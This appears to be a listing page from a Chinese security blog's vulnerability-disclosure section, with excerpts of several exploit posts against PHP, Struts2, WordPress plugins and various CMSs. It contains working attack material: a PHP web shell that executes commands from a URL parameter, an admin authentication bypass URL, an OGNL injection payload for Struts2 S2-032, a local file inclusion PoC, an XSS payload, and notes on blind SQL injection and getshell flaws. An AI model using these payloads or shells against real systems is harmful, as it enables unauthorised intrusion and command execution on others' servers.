• 绕过PHP5.2.X的安全模式

    绕过PHP5.2.X的安全模式
    php版本小于等于5.2.* <?php         //Exploit Code         system('\dir');         system('\net user');         print passthru ('\ipconfig');         exec('\whoami',$a);         print_r($a);         //Shell Script         //shell.php?cmd=net user         $cmd = '\\'.$_GET['cmd'];         system($cmd); ?>
    作者:unhonker| 发布:2016年5月13日 | 分类:漏洞公布 | 阅读:2,744次| 标签:
  • Alibaba Clone B2B Script管理身份绕过漏洞

    Alibaba Clone B2B Script管理身份绕过漏洞
    # Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass # Vendor Homepage: [url]http://alibaba-clone.com/[/url] # Version: All Versions     Exploit : For enter , simply enter the following code http://server/admin/adminhome.php?tmp=1     For each page is enough to add the following code to the end of url example see page...
    作者:unhonker| 发布:2016年5月05日 | 分类:漏洞公布 | 阅读:3,353次|
  • Struts2-032漏洞利用工具

    Struts2-032漏洞利用工具
    转载自shack2 新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具,这个鸡肋工具就不在这里共享了。 顺便分享下我改写的exp: S2-032 20160426 漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924 获取磁盘目录: 1. method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org...
    作者:unhonker| 发布:2016年4月26日 | 分类:漏洞公布 | 阅读:4,377次| 标签:
  • 青云客博客cms某处盲注

    青云客博客cms某处盲注
    延时注入,写代码受网速影响比较严重,网速不稳的话,可能误差比较大,当然,你可以适当把sleep数字搞大些,freebuf上面有一个转换成二进制,然后再开8个线程跑数据的思路,这里我就不写了。 在include/class_temp.php中 function articlelist($mark='',$ispage=true,$pagebtn=2,$auto=true,$bcat=0,$scat='',$lcat='',$size=0,$star=0,$word='',$order='',$searfie='titl...
    作者:unhonker| 发布:2016年4月15日 | 分类:漏洞公布 | 阅读:2,986次| 标签:
  • phpcmsV9.6 getshell

    phpcmsV9.6 getshell
    这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。 详细说明: PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修...
    作者:unhonker| 发布:2016年3月22日 | 分类:漏洞公布 | 阅读:7,205次| 标签:
  • WordPress Abtest本地文件包含漏洞

    WordPress Abtest本地文件包含漏洞
    出现漏洞的文件为:abtest_admin.php <?php require 'admin/functions.php'; if (isset($_GET['action'])) { include 'admin/' . $_GET['action'] . '.php'; } else { include 'admin/list_experiments.php'; } ?> # PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
    作者:unhonker| 发布:2016年3月22日 | 分类:漏洞公布 | 阅读:3,768次| 标签:
  • Fiyo CMS 2.0.2.1 XSS漏洞

    Fiyo CMS 2.0.2.1 XSS漏洞
    *3. Affected Modules* Affected fields in the modules are listed below: i. Users User Group -> Group Name, Description ii. Modules Module Details->Judul Modul, Posisi iii. Menus Main Menu-> Menu Details->Nama Footer Menu-> Menu Details->Nama Categories->Menu Details->Judul Kategori Admin Panel-> ...
    作者:unhonker| 发布:2016年2月25日 | 分类:漏洞公布 | 阅读:2,267次| 标签:
  • MetInfo 5.3.3一处XSS

    MetInfo 5.3.3一处XSS
    比较鸡肋的一处XSS 漏洞细节: 后台——用户——管理员——编辑——在“姓名一栏”里插入代码 <script>alert('XSS')</script> 最后一步——保存
    作者:unhonker| 发布:2016年1月08日 | 分类:漏洞公布 | 阅读:3,006次| 标签:
  • phpshe后台任意文件删除(后台无限制拿shell)

    phpshe后台任意文件删除(后台无限制拿shell)
    90sec@Joseph case 'del':         pe_token_match();         $tpl_name = pe_dbhold($_g_tpl);         if ($tpl_name == 'default') pe_error('默认模板不能删除...');         if ($db->pe_num('setting', array('setting_key'=>'web_tpl', 'setting_value'=>$tpl_name))) {                 pe_error('模板正在使用中...');         }         else { ...
    作者:unhonker| 发布:2015年12月28日 | 分类:漏洞公布 | 阅读:3,075次| 标签: